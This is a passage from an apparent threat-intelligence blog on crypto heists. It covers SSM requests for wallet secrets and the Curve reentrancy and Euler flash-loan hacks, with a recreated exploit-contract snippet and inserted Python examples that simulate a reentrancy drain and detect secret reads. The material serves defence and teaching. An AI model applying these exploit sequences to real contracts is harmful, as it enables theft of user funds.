baseline;">{"name":"/prod/wallets/signing-svc/db/user","withDecryption":true}<br/></code><code style="vertical-align: baseline;">{"name":"/prod/wallets/signing-svc/db/password","withDecryption":true}<br/></code><code style="vertical-align: baseline;">{"name":"/prod/wallets/eth/db/password","withDecryption":true}<br/></code><code style="vertical-align: baseline;">{"name":"/prod/wallets/btc/db/password","withDecryption":true}</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 3: Example AWS SSM Parameter Store Requests related to cryptocurrency wallets</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While a heist may seem fast given the sudden losses, Mandiant has observed crypto exchange attacks with </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2024"><span style="text-decoration: underline; vertical-align: baseline;">dwell times</span></a><span style="vertical-align: baseline;"> of up to 12 months, indicating a significant opportunity for improved threat detection to prevent heists. Exchanges that have detected attacks early in the attack lifecycle have been successful at thwarting heists. 
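The CloudTrail detail above is also the kind of signal a detection can key on. The following is an added example, not Mandiant's tooling, that runs two checks over constructed CloudTrail records (the role ARNs, parameter names and IP addresses are made up for the example): it flags any decrypting SSM read of a parameter under an assumed wallet namespace by an identity outside an allowlist, and it flags one identity decrypting several distinct wallet secrets within a short window, which is what the requests in Figure 3 look like.

```python
"""Detection logic for decrypting reads of wallet secrets in CloudTrail.

Added example; not Mandiant's tooling. The CloudTrail records below are
constructed, not taken from an investigation, but follow the record format
for SSM Parameter Store calls (eventName, requestParameters, withDecryption).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumptions: the exchange keeps wallet material under this prefix and only
# the signing service's role is expected to decrypt it.
SENSITIVE_PREFIXES = ("/prod/wallets/",)
SIGNING_SVC = "arn:aws:sts::123456789012:assumed-role/signing-svc-role/i-0abc123def456"
OPERATOR = "arn:aws:sts::123456789012:assumed-role/DevOpsAdmin/jdoe"
ALLOWED_PRINCIPALS = {SIGNING_SVC}
DECRYPTING_CALLS = {"GetParameter", "GetParameters", "GetParametersByPath"}
BURST_WINDOW = timedelta(minutes=10)
BURST_THRESHOLD = 3  # distinct wallet secrets decrypted by one principal inside the window


def _record(time, arn, ip, event_name, params):
    """Minimal CloudTrail record (constructed sample data)."""
    return {
        "eventTime": time,
        "eventSource": "ssm.amazonaws.com",
        "eventName": event_name,
        "userIdentity": {"type": "AssumedRole", "arn": arn},
        "sourceIPAddress": ip,
        "requestParameters": params,
    }


SAMPLE_EVENTS = [
    # routine read by the service that legitimately needs the secret
    _record("2024-05-01T09:00:00Z", SIGNING_SVC, "10.0.1.5", "GetParameter",
            {"name": "/prod/wallets/signing-svc/db/password", "withDecryption": True}),
    # an operator identity decrypting every wallet secret within seconds
    _record("2024-05-01T13:02:10Z", OPERATOR, "203.0.113.45", "GetParameter",
            {"name": "/prod/wallets/wallets-password", "withDecryption": True}),
    _record("2024-05-01T13:02:12Z", OPERATOR, "203.0.113.45", "GetParameter",
            {"name": "/prod/wallets/signing-svc/db/user", "withDecryption": True}),
    _record("2024-05-01T13:02:15Z", OPERATOR, "203.0.113.45", "GetParameters",
            {"names": ["/prod/wallets/eth/db/password", "/prod/wallets/btc/db/password"],
             "withDecryption": True}),
    # noise: a non-wallet parameter, and a wallet parameter read without decryption
    _record("2024-05-01T13:05:00Z", OPERATOR, "203.0.113.45", "GetParameter",
            {"name": "/prod/app/feature-flags", "withDecryption": False}),
    _record("2024-05-01T13:06:00Z", OPERATOR, "203.0.113.45", "GetParameter",
            {"name": "/prod/wallets/btc/db/password", "withDecryption": False}),
]


def _requested_names(req):
    """GetParameters carries a list; GetParameter a name; GetParametersByPath a path."""
    if "names" in req:
        return list(req["names"])
    return [req.get("name") or req.get("path") or ""]


def decrypted_secret_reads(events):
    """One finding per wallet-secret name that was read with decryption."""
    findings = []
    for ev in events:
        req = ev.get("requestParameters") or {}
        if ev.get("eventSource") != "ssm.amazonaws.com":
            continue
        if ev.get("eventName") not in DECRYPTING_CALLS or not req.get("withDecryption"):
            continue
        for name in _requested_names(req):
            if name.startswith(SENSITIVE_PREFIXES):
                findings.append({
                    "time": datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ"),
                    "principal": ev["userIdentity"]["arn"],
                    "source_ip": ev["sourceIPAddress"],
                    "name": name,
                })
    return findings


def unexpected_reads(events):
    """Decrypting reads by any identity outside the allowlist."""
    return [f for f in decrypted_secret_reads(events) if f["principal"] not in ALLOWED_PRINCIPALS]


def bursts(events):
    """Principals that decrypted >= BURST_THRESHOLD distinct wallet secrets within BURST_WINDOW."""
    by_principal = defaultdict(list)
    for f in decrypted_secret_reads(events):
        by_principal[f["principal"]].append(f)
    flagged = {}
    for principal, reads in by_principal.items():
        reads.sort(key=lambda f: f["time"])
        widest = 0
        for i, start in enumerate(reads):
            in_window = {f["name"] for f in reads[i:] if f["time"] - start["time"] <= BURST_WINDOW}
            widest = max(widest, len(in_window))
        if widest >= BURST_THRESHOLD:
            flagged[principal] = widest
    return flagged


if __name__ == "__main__":
    for f in unexpected_reads(SAMPLE_EVENTS):
        print(f"{f['time']:%H:%M:%S} {f['principal']} {f['source_ip']} decrypted {f['name']}")
    print("burst:", bursts(SAMPLE_EVENTS))
```

In a real environment the same logic runs over CloudTrail delivered to a SIEM; the prefix and the allowlist are the two settings to tune per exchange. Given how little time passed between the decrypting reads and the drain, a single decrypting read outside the allowlist is already worth an alert on its own, and the burst check is there to catch an allowlisted identity whose credentials were taken.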
To learn more about crypto exchange heists, check out this upcoming presentation “</span><a href="https://mwise.mandiant.com/conf24/session/2321452/from-job-interview-to-crypto-heist-how-north-korea-sponsored-threat-actor-stole-million-dollars-of-crypto-currency" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">From Job Interview to Crypto Heist</span></a><span style="vertical-align: baseline;">” at the </span><a href="https://mwise.mandiant.com/conf24" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">mWISE Conference</span><span style="vertical-align: baseline;"> in Denver, September 18-19</span></a>.</p> <h2><span style="vertical-align: baseline;">Smart Contract Exploits</span></h2> <p><span style="vertical-align: baseline;">Smart contracts are code that runs on a blockchain and is typically open source, decentralized, immutable, and permissionless. Their code is often transparent and publicly verifiable, which means that any interested party can see exactly what logic a smart contract follows when it receives digital assets. Exploiting smart contracts typically involves finding flaws in the code's logic in order to steal the underlying assets – no credential theft, malware, or C2 infrastructure required. </span></p> <p><span style="vertical-align: baseline;">Smart contracts are invoked anytime one wants to request a computation within a blockchain network. Well-known networks that employ smart contract technology include Ethereum, Tron, and Solana. Smart contracts can be used to support arbitrarily complex user-facing apps and services such as marketplaces, financial utilities, and games. Any developer can create a smart contract and deploy it by paying a fee to the network. 
Any user can then pay a fee to the network to call the smart contract to execute its code.</span></p> <p><span style="vertical-align: baseline;">The programming language behind a smart contract typically depends on the network where it will be deployed. </span><a href="https://soliditylang.org/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Solidity</span></a><span style="vertical-align: baseline;"> is the most popular programming language used to develop smart contracts on the Ethereum network. Other networks may involve different systems that require the use of other programming languages such as Python for Algorand and Rust for Solana. Once a smart contract is ready to be deployed, it is compiled into bytecode. The bytecode is decentralized and transparent; therefore, even if the high-level code used to compile a contract is unavailable, the bytecode is publicly available and can be decompiled to see the functions present in the contract.</span></p> <p><span style="vertical-align: baseline;">A fundamentally sound understanding of the programming language is essential when developing smart contracts as they are heavily targeted due to their financial nature. Good smart contract practices can also overlap with traditional secure programming practices like implementing safe libraries to perform arithmetic; however, smart contracts possess unique behaviors that open them up to their own subset of challenges.</span></p> <h3><span style="vertical-align: baseline;">Reentrancy Attack</span></h3> <p><span style="vertical-align: baseline;">Smart contracts can interact with other smart contracts in the network by performing an external call. External calls should be treated as untrusted since the behavior of an external contract is not always guaranteed, regardless of whether the external contract is known to be good, since the external contract itself could unwillingly execute malicious code via an external call of its own. 
It is because of this that smart contract developers should ensure there is nothing critical being done after an external call is executed.</span></p> <p><span style="vertical-align: baseline;">The first, and perhaps most widely known, smart contract exploit occurred in June 2016 when </span><a href="https://www.gemini.com/cryptopedia/the-dao-hack-makerdao" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">The DAO was hacked for $55 million</span></a><span style="vertical-align: baseline;"> worth of Ether (ETH). While much has been </span><a href="https://decrypt.co/41952/book-sheds-new-light-on-ethereums-55-million-dao-hack" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">written</span></a><span style="vertical-align: baseline;"> about that heist, the perpetrator remains a mystery. The hack utilized a technique now known as a "</span><a href="https://blog.chain.link/reentrancy-attacks-and-the-dao-hack/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reentrancy attack,</span></a><span style="vertical-align: baseline;">" which abused the transfer mechanism that sent ETH before updating its internal state, thus allowing the attacker to create a sequence of recursive calls to siphon funds. This has become a common attack vector for smart contracts that has resulted in the theft of hundreds of millions of dollars in digital assets.</span></p> <h4><span style="vertical-align: baseline;">Curve Finance Hack</span></h4> <p><span style="vertical-align: baseline;">A more recent example of a successful reentrancy attack in the wild came by way of Curve Finance, one of the most-used and influential decentralized exchanges. 
In July of 2023, </span><a href="https://www.nasdaq.com/articles/after-the-curve-attack:-whats-next-for-defi" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">$70 million was stolen</span></a><span style="vertical-align: baseline;"> via a vulnerability in </span><a href="https://vyperlang.org/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Vyper</span></a><span style="vertical-align: baseline;"> that allowed for reentrancy attacks on older versions (0.2.15, 0.2.16 and 0.3.0).</span><span style="vertical-align: baseline;"> </span></p> <p><span style="vertical-align: baseline;">Reentrancy vulnerabilities can typically be triggered when a state change is performed after an external call. A common target is a contract that allows users to deposit funds to a pool and withdraw them later. The withdraw function would typically check if the user has enough balance before initiating the transfer. Despite this check, a malicious contract can exploit the smart contract by triggering multiple withdraw calls before the first transfer is complete. This bypasses the balance check because the contract's state has not been updated yet, leading to unauthorized withdrawals. The transfer process is repeated until the pool has no more available funds. 
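The sequence just described can be reproduced in a few dozen lines. Below is an added example written for this post, not code from Curve or Vyper: it models a pool contract whose withdraw function checks the balance, sends funds through an external call and only then updates the balance, beside a version that applies checks-effects-interactions and a reentrancy lock. A recursion depth limit stands in for gas, a swallowed Revert models a low-level call whose failure the caller ignores, and all amounts are constructed.

```python
"""Reentrancy on a deposit/withdraw pool, modelled in Python.

Added example, not Curve's or Vyper's code. The external call is modelled as
a Python method call into the receiving contract; the EVM's revert becomes an
exception. Amounts are constructed.
"""


class Revert(Exception):
    """Models an EVM revert of the current call."""


class VulnerablePool:
    """Check, then external call, then state update: the pattern described in the text."""

    def __init__(self, funds):
        self.funds = funds      # ETH held by the contract on behalf of other users (constructed)
        self.balances = {}      # per-user accounting balance

    def deposit(self, who, amount):
        self.balances[who] = self.balances.get(who, 0) + amount
        self.funds += amount

    def withdraw(self, who, amount):
        if self.balances.get(who, 0) < amount:   # check
            raise Revert("insufficient balance")
        self.funds -= amount
        who.receive(self, amount)                # interaction happens before the effect
        self.balances[who] -= amount             # effect: too late, goes negative under reentry


class SafePool(VulnerablePool):
    """Checks-effects-interactions plus a lock, the role @nonreentrant is meant to play."""

    def __init__(self, funds):
        super().__init__(funds)
        self._locked = False

    def withdraw(self, who, amount):
        if self._locked:
            raise Revert("reentrant call")
        if self.balances.get(who, 0) < amount:
            raise Revert("insufficient balance")
        self._locked = True
        try:
            self.balances[who] -= amount         # effect first
            self.funds -= amount
            who.receive(self, amount)            # interaction last
        finally:
            self._locked = False


class Attacker:
    """Receiving contract whose fallback re-enters withdraw while the pool still has funds."""

    def __init__(self, amount, max_depth=50):
        self.amount = amount
        self.max_depth = max_depth   # stands in for the transaction's gas limit
        self.depth = 0
        self.stolen = 0

    def receive(self, pool, amount):
        self.stolen += amount
        if self.depth < self.max_depth and pool.funds >= self.amount:
            self.depth += 1
            try:
                pool.withdraw(self, self.amount)   # re-enter before the balance is updated
            except Revert:
                pass                               # a failed low-level call is just ignored

    def attack(self, pool):
        pool.deposit(self, self.amount)
        pool.withdraw(self, self.amount)
        return self.stolen


def simulate(pool_cls, honest_funds=10, attacker_stake=1):
    """Return (amount the attacker received, funds left in the pool)."""
    pool = pool_cls(honest_funds)
    attacker = Attacker(attacker_stake)
    return attacker.attack(pool), pool.funds


if __name__ == "__main__":
    print("vulnerable:", simulate(VulnerablePool))
    print("guarded:   ", simulate(SafePool))
```

Running it, the vulnerable pool pays out 11 for a deposit of 1 and ends empty, while the guarded pool returns only the deposit: the re-entered call hits the lock and reverts, and even without the lock it would fail the balance check because the balance was already reduced before the external call.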
This vulnerable pattern is present in the Vyper code targeted in the </span><a href="https://cryptomaton.medium.com/a-deep-dive-into-how-curve-pools-70-million-reentrancy-exploit-was-possible-7e0db6b0cecf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Curve Finance exploit</span></a><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;"><span style="background-color: 
#f9ab00;">@nonreentrant('lock')</span><br/></code><code style="vertical-align: baseline;">def remove_liquidity(<br/></code><code style="vertical-align: baseline;"> _burn_amount: uint256,<br/></code><code style="vertical-align: baseline;"> _min_amounts: uint256[N_COINS],<br/></code><code style="vertical-align: baseline;"> _receiver: address = msg.sender<br/></code><code style="vertical-align: baseline;">) -&gt; uint256[N_COINS]:<br/></code><code style="vertical-align: baseline;"> """<br/></code><code style="vertical-align: baseline;"> @notice Withdraw coins from the pool<br/></code><code style="vertical-align: baseline;"> @dev Withdrawal amounts are based on current deposit ratios<br/></code><code style="vertical-align: baseline;"> @param _burn_amount Quantity of LP tokens to burn in the withdrawal<br/></code><code style="vertical-align: baseline;"> @param _min_amounts Minimum amounts of underlying coins to receive<br/></code><code style="vertical-align: baseline;"> @param _receiver Address that receives the withdrawn coins<br/></code><code style="vertical-align: baseline;"> @return List of amounts of coins that were withdrawn<br/></code><code style="vertical-align: baseline;"> """<br/></code><code style="vertical-align: baseline;"> total_supply: uint256 = self.totalSupply<br/></code><code style="vertical-align: baseline;"> amounts: uint256[N_COINS] = empty(uint256[N_COINS])</code></p> <p><code style="vertical-align: baseline;"> for i in range(N_COINS):<br/></code><code style="vertical-align: baseline;"> old_balance: uint256 = self.balances[i]<br/></code><code style="vertical-align: baseline;"> value: uint256 = old_balance * _burn_amount / total_supply<br/></code><code style="vertical-align: baseline;"> assert value &gt;= _min_amounts[i], "Withdrawal resulted in fewer coins than expected"<br/></code><code style="vertical-align: baseline;"> self.balances[i] = old_balance - value<br/></code><code style="vertical-align: baseline;"> amounts[i] = value<br/></code></p> 
<p><code style="vertical-align: baseline;"> if i == 0:<br/></code><code style="vertical-align: baseline;"> raw_call(_receiver, b"", value=value)<br/></code><code style="vertical-align: baseline;"> else:<br/></code><code style="vertical-align: baseline;"> response: Bytes[32] = </code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">raw_call</span></code><code style="vertical-align: baseline;">(<br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">self.coins[1]</span></code><code style="vertical-align: baseline;">,<br/></code><code style="vertical-align: baseline;"> concat(<br/></code><code style="vertical-align: baseline;"> method_id("transfer(address,uint256)"),<br/></code><code style="vertical-align: baseline;"> convert(_receiver, bytes32),<br/></code><code style="vertical-align: baseline;"> convert(value, bytes32),<br/></code><code style="vertical-align: baseline;"> ),<br/></code><code style="vertical-align: baseline;"> max_outsize=32,<br/></code><code style="vertical-align: baseline;"> )<br/></code><code style="vertical-align: baseline;"> if len(response) &gt; 0:<br/></code><code style="vertical-align: baseline;"> assert convert(response, bool)<br/></code></p> <p><code style="vertical-align: baseline;"> total_supply -= _burn_amount<br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">self.balanceOf[msg.sender] -= _burn_amount</span><br/></code><code style="vertical-align: baseline;"> self.totalSupply = total_supply<br/></code><code style="vertical-align: baseline;"> log Transfer(msg.sender, ZERO_ADDRESS, _burn_amount)<br/></code></p> <p><code style="vertical-align: baseline;"> log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply)<br/></code></p> <p><code style="vertical-align: baseline;"> return amounts</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> 
</div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 4: The Vulnerable Curve Finance </span><code style="vertical-align: baseline;">remove_liquidity</code><span style="vertical-align: baseline;"> function</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The </span><code style="vertical-align: baseline;">remove_liquidity</code><span style="vertical-align: baseline;"> smart contract updates how much liquidity </span><code style="vertical-align: baseline;">msg.sender</code><span style="vertical-align: baseline;"> has in the pool by subtracting the burn fee with </span><code style="vertical-align: baseline;">self.balanceOf[msg.sender] -= _burn_amount</code><span style="vertical-align: baseline;">. This is followed by a call to </span><code style="vertical-align: baseline;">Transfer()</code><span style="vertical-align: baseline;"> on the </span><code style="vertical-align: baseline;">msg.sender</code><span style="vertical-align: baseline;"> for the amount associated with the account. </span></p> <p><span style="vertical-align: baseline;">The issue lies at the external call to </span><code style="vertical-align: baseline;">self.coins[1]</code><span style="vertical-align: baseline;">. Here, the </span><code style="vertical-align: baseline;">@nonreentrant</code><span style="vertical-align: baseline;"> modifier did not protect the function from being re-entered within the same transaction before the external call. 
Therefore, an attacker was able to manipulate the external call to </span><code style="vertical-align: baseline;">self.coins[1]</code><span style="vertical-align: baseline;"> to recursively make a </span><code style="vertical-align: baseline;">raw_call</code><span style="vertical-align: baseline;"> back into the original </span><code style="vertical-align: baseline;">remove_liquidity</code><span style="vertical-align: baseline;"> function before it had finished updating the state variables. With the </span><code style="vertical-align: baseline;">@nonreentrant</code><span style="vertical-align: baseline;"> modifier ineffective, the layout of the smart contract (an external call before the state update) led to the draining of funds from the contract.</span></p> <h3><span style="vertical-align: baseline;">Flash Loan Attack</span></h3> <p><span style="vertical-align: baseline;">Another common attack vector for smart contracts is the "flash loan attack." Flash loans are unsecured debt (no collateral) that must be repaid in the same transaction. There are legitimate uses of flash loans (e.g., arbitrage), but hackers can also use them to manipulate DeFi pricing oracles by buying or short selling high volumes of tokens that have thin supply. </span></p> <h4><span style="vertical-align: baseline;">Euler Finance Hack</span></h4> <p><span style="vertical-align: baseline;">In March 2023, the DeFi lending protocol Euler Finance suffered a </span><a href="https://medium.com/@omniscia.io/euler-finance-incident-post-mortem-1ce077c28454" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">flash loan attack</span></a><span style="vertical-align: baseline;"> that resulted in the theft of nearly $200 million. 
The attacker initially used </span><a href="https://home.treasury.gov/news/press-releases/jy0916" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Tornado Cash</span></a><span style="vertical-align: baseline;">, a mixer that obfuscates the origins and ownership of cryptocurrency, to obtain the funds necessary for the heist. The attacker initiated a flash loan to borrow $30 million from the DeFi protocol </span><a href="https://aave.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Aave</span></a><span style="vertical-align: baseline;">. The attacker then deposited $20 million of the borrowed </span><a href="https://en.wikipedia.org/wiki/Dai_(cryptocurrency)" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DAI</span></a><span style="vertical-align: baseline;"> stablecoin into Euler, receiving eDAI tokens in return. These eDAI tokens were then leveraged to borrow ten times their value. The attacker used the remaining $10 million in DAI to repay part of the debt, and then exploited a flaw in Euler's system to repeatedly borrow more funds using the same mint function until the flash loan was finally closed.</span></p> <p><span style="vertical-align: baseline;">The blockchain security firm </span><a href="https://x.com/peckshield/status/1635231791509549057?s=20" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PeckShield</span></a><span style="vertical-align: baseline;"> identified the vulnerability in Euler Finance’s </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> function. The contract permits a user to donate their balance to the </span><code style="vertical-align: baseline;">reserveBalance</code><span style="vertical-align: baseline;"> of the token they are transacting with. 
No health check is performed on the account that initiates the donation. A donation via </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> could also reduce a user's equity (EToken) balance without affecting their debt (DToken), causing an imbalance that could lead to a liquidation. During liquidation, a percentage-based discount is applied to the collateral, incentivizing liquidators to take on the debt. The attacker intentionally over-leveraged their position to cause a significant discount before triggering a self-liquidation. The substantial discount ensured the attacker acquired the collateral cheaply while having their remaining assets cover their debts. This left Euler Finance with a significant amount of unbacked "bad debt" and the attacker with a highly profitable, over-collateralized position.</span></p> <p><span style="vertical-align: baseline;">A </span><a href="https://github.com/iphelix/euler-exploit-poc/blob/main/pocs/EulerHack.sol" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">recreation</span></a><span style="vertical-align: baseline;"> of the </span><code style="vertical-align: baseline;">violator</code><span style="vertical-align: baseline;"> contract used in the Euler Finance hack helps visualize the steps taken to perform the heist. The contract deposits two-thirds of their initial token balance into the protocol as collateral to gain borrowing power. The contract borrows a significant amount of </span><code style="vertical-align: baseline;">eToken</code><span style="vertical-align: baseline;"> against their deposited collateral and repays one-third of their initial balance. 
The contract proceeds to borrow the original amount of eToken again and invokes </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> to force a liquidation of their own position.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">function violator(address exploit, uint256 initialBalance, uint256 mintAmount, uint256 donateAmount, uint256 maxWithdraw, IERC20 token, EToken eToken, DToken dToken) external returns (bool) {</code></p> <p><code style="vertical-align: baseline;"> token.approve(EulerProtocol.euler, type(uint256).max);</code></p> <p><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">eToken.deposit(0, (2 * initialBalance / 3) * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span 
style="background-color: #f9ab00;">eToken.mint(0, mintAmount * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">dToken.repay(0, (initialBalance / 3) * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">eToken.mint(0, mintAmount * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">eToken.donateToReserves(0, donateAmount * 10**eToken.decimals());</span></code></p> <p><code style="vertical-align: baseline;"> console.log("[*] Generated bad loan...");<br/></code><code style="vertical-align: baseline;"> console.log(" Collateral: %d Debt: %d", eToken.balanceOf(address(this))/10**eToken.decimals(), dToken.balanceOf(address(this))/10**dToken.decimals());</code></p> <p><code style="vertical-align: baseline;"> return liquidator.liquidate(exploit, initialBalance, mintAmount, donateAmount, maxWithdraw, address(this), token, eToken, dToken);<br/></code><code style="vertical-align: baseline;">}</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 5: Recreated Snippet from Violator Contract used in the Euler Finance Hack</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> contract was missing a health check to confirm the donator's debt is greater than or equal to the donation amount as the debt should be reduced or otherwise be set to zero. 
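To make the missing check concrete, here is an added example, constructed for this post rather than taken from Euler's code, of a stripped-down lending market. Accounts hold an equity balance and a debt balance, mint is a self-collateralised borrow that raises both by the same amount, and donateToReserves gives up equity while leaving debt untouched. The collateral factor, the discount curve and the amounts are constructed, and the deposit/mint/repay/mint sequence from Figure 5 is collapsed into a single mint; the point is that without a liquidity check after the donation, the donation alone pushes the account below the liquidation threshold, which is exactly the position the attacker wanted.

```python
"""A minimal lending market showing the missing health check on donateToReserves.

Added example, not Euler's code. Collateral factor, discount curve and
amounts are constructed for illustration.
"""
from dataclasses import dataclass

COLLATERAL_FACTOR = 0.9  # constructed; not Euler's real risk parameter
MAX_DISCOUNT = 0.20      # constructed cap on the liquidation discount


class Revert(Exception):
    """Models an EVM revert."""


@dataclass
class Account:
    collateral: float = 0.0  # equity balance (eToken-like)
    debt: float = 0.0        # debt balance (dToken-like)

    def health(self):
        """Risk-adjusted collateral over debt; below 1.0 the account can be liquidated."""
        if self.debt == 0:
            return float("inf")
        return self.collateral * COLLATERAL_FACTOR / self.debt

    def is_liquidatable(self):
        return self.health() < 1.0


def liquidation_discount(health):
    """Constructed discount curve: the deeper underwater, the cheaper the collateral."""
    return min(MAX_DISCOUNT, max(0.0, 1.0 - health))


class Market:
    def __init__(self, check_health_on_donate):
        self.reserves = 0.0
        self.check_health_on_donate = check_health_on_donate  # False = the vulnerable behaviour

    def mint(self, acct, amount):
        """Self-collateralised borrow: deposit and borrow the same amount in one step."""
        after = Account(acct.collateral + amount, acct.debt + amount)
        if after.is_liquidatable():
            raise Revert("mint would leave the account undercollateralised")
        acct.collateral, acct.debt = after.collateral, after.debt

    def donate_to_reserves(self, acct, amount):
        """Give equity to the reserve; debt is untouched, which is the whole problem."""
        if amount > acct.collateral:
            raise Revert("donation exceeds balance")
        after = Account(acct.collateral - amount, acct.debt)
        if self.check_health_on_donate and after.is_liquidatable():
            raise Revert("donation would leave the account liquidatable")  # the missing check
        acct.collateral = after.collateral
        self.reserves += amount


def scenario(check_health_on_donate, deposit=1000.0, mint_amount=4000.0, donation=1500.0):
    """Deposit, self-collateralised mint, then donate; report where the account ends up."""
    market = Market(check_health_on_donate)
    acct = Account(collateral=deposit)
    market.mint(acct, mint_amount)
    try:
        market.donate_to_reserves(acct, donation)
        donated = True
    except Revert:
        donated = False
    return {
        "donated": donated,
        "health": acct.health(),
        "liquidatable": acct.is_liquidatable(),
        "discount": liquidation_discount(acct.health()),
    }


if __name__ == "__main__":
    print("without check:", scenario(check_health_on_donate=False))
    print("with check:   ", scenario(check_health_on_donate=True))
```

Both state-changing functions compute the prospective account first and revert before mutating anything, which is how a revert-on-failure check should be structured; the vulnerable path is the one where the prospective health is simply never consulted.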
